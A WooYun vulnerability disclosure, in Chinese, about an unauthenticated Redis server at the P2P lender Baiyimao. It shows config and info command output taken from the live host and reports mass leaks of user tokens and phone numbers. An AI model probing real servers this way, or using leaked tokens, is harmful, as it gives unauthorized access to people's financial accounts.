当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0161880

漏洞标题:p2p佰亿猫某系统未授权访问,大量用户TOKEN泄漏

相关厂商:佰亿猫

漏洞作者: sauren

提交时间:2015-12-16 18:52

修复时间:2016-01-28 17:10

公开时间:2016-01-28 17:10

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-16: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-01-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

深圳佰亿猫金融服务有限公司成立于2015年,注册资本1000万元人民币,在职员工100余名,为中小企业和个人投资者提供高效,安全,便捷的 P2P理财服务,管理团队成员均来自银行,法律,风控,互联网资深专业人士,拥有国内外从业相关经验,公司与合作的金融机构严格为投资者把控风 险。树立独特竞争优势,实现全民理财梦想
“佰亿猫”携手平安保险,为公司平台的个人投资者投保个人账户资金安全保险,最大限度保障投资者的资金安全,为投资者争取更多的权益和保障

详细说明:

redis未授权访问。

baiyimao.png


15W+的KEY

baiyimao1.png


大量手机号+认证KEY泄漏

漏洞证明:

www.baiyimao.com:0>config get *

dbfilename
authorized_keys
requirepass
masterauth
bind
unixsocket
logfile
pidfile
/var/run/redis.pid
maxmemory
0
maxmemory-samples
3
timeout
0
tcp-keepalive
0
auto-aof-rewrite-percentage
100
auto-aof-rewrite-min-size
1048576
hash-max-ziplist-entries
512
hash-max-ziplist-value
64
list-max-ziplist-entries
512
list-max-ziplist-value
64
set-max-intset-entries
512
zset-max-ziplist-entries
128
zset-max-ziplist-value
64
lua-time-limit
5000
slowlog-log-slower-than
10000
slowlog-max-len
128
port
6379
databases
16
repl-ping-slave-period
10
repl-timeout
60
maxclients
10000
watchdog-period
0
slave-priority
100
hz
10
no-appendfsync-on-rewrite
no
slave-serve-stale-data
yes
slave-read-only
yes
stop-writes-on-bgsave-error
yes
daemonize
no
rdbcompression
yes
rdbchecksum
yes
activerehashing
yes
repl-disable-tcp-nodelay
no
appendonly
no
dir
D:\redis
maxmemory-policy
volatile-lru
appendfsync
everysec
save
3600 1 300 100 60 10000
loglevel
notice
client-output-buffer-limit
normal 0 0 0 slave 268435456 67108864 60 pubsub 33554432 8388608 60
unixsocketperm
0
slaveof


配置信息,应该是WINDOWS 服务器。
www.baiyimao.com:0>info

# Server
redis_version:2.6.12
redis_git_sha1:00000000
redis_git_dirty:0
redis_mode:standalone
os:Windows  
arch_bits:64
multiplexing_api:winsock_IOCP
gcc_version:0.0.0
process_id:856
run_id:b06673ac7e51e2fefef471993aa814bd551038fc
tcp_port:6379
uptime_in_seconds:1062308
uptime_in_days:12
hz:10
lru_clock:322447
# Clients
connected_clients:16
client_longest_output_list:0
client_biggest_input_buf:0
blocked_clients:0
# Memory
used_memory:31506040
used_memory_human:30.05M
used_memory_rss:31506040
used_memory_peak:38105100
used_memory_peak_human:36.34M
used_memory_lua:31744
mem_fragmentation_ratio:1.00
mem_allocator:libc
# Persistence
loading:0
rdb_changes_since_last_save:-22
rdb_bgsave_in_progress:0
rdb_last_save_time:1450259222
rdb_last_bgsave_status:ok
rdb_last_bgsave_time_sec:2
rdb_current_bgsave_time_sec:-1
aof_enabled:0
aof_rewrite_in_progress:0
aof_rewrite_scheduled:0
aof_last_rewrite_time_sec:-1
aof_current_rewrite_time_sec:-1
aof_last_bgrewrite_status:ok
# Stats
total_connections_received:2756
total_commands_processed:3347859
instantaneous_ops_per_sec:0
rejected_connections:0
expired_keys:10965
evicted_keys:0
keyspace_hits:2378785
keyspace_misses:120949
pubsub_channels:0
pubsub_patterns:0
latest_fork_usec:0
# Replication
role:master
connected_slaves:0
# CPU
used_cpu_sys:143.36
used_cpu_user:974.27
used_cpu_sys_children:0.00
used_cpu_user_children:0.00
# Keyspace
db0:keys=159352,expires=3521


服务器INFO信息

修复方案:

redis加密码

版权声明:转载请注明来源 sauren@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝